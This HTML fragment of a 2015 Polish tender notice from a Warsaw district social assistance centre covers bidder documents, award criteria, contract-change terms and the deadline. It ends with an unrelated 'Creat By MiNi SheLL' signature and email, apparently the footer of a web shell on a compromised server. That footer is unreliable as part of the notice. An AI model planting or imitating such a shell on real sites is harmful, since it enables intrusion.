<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje  możliwość zmiany postanowień Umowy w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy, w sytuacji konieczności wprowadzenia takiej zmiany wynikającej z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, dopuszcza się możliwość dokonania następujących zmian w umowie:
1)zmiany ilości przedmiotu zamówienia;
2)zmianę sposobu i terminów realizacji zamówienia.
2.Warunkiem dokonania zmian wskazanych powyżej, w szczególności mogą być następujące okoliczności:
1) wymagać tego będzie prawidłowa realizacja przez Zamawiającego lub Wykonawcę zadań polegających na zabezpieczeniu realizacji usług na rzecz świadczeniobiorców;
2)będzie to konieczne ze względu na zmianę przepisów prawa.
3.W sytuacji zajścia okoliczności, o których mowa wyżej, Zamawiający bądź Wykonawca, w terminie do 14 dni od ich wystąpienia powiadomi drugą Stronę o tym fakcie. Następnie Strony Umowy, w terminie 7 dni od daty w/wym. Powiadomienia, przystępują do negocjacji na temat zmiany postanowień Umowy w przedmiotowym zakresie.
4.Zmiana Umowy może spowodować w zależności od okoliczności zmniejszenie lub zwiększenie wynagrodzenia. Do ustalenia wynagrodzenia w związku ze zmianą Umowy mają zastosowanie stawki i elementy cenotwórcze jak w formularzu Oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opswlochy.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Dzielnicy Włochy m. st. Warszawy, ul. Czereśniowa 35, 02-457 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.11.2015 godzina 09:00, miejsce: Ośrodek Pomocy Społecznej Dzielnicy Włochy m. st. Warszawy, ul. Czereśniowa 35, 02-457 Warszawa - Kancelaria (II - pok. nr 13).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com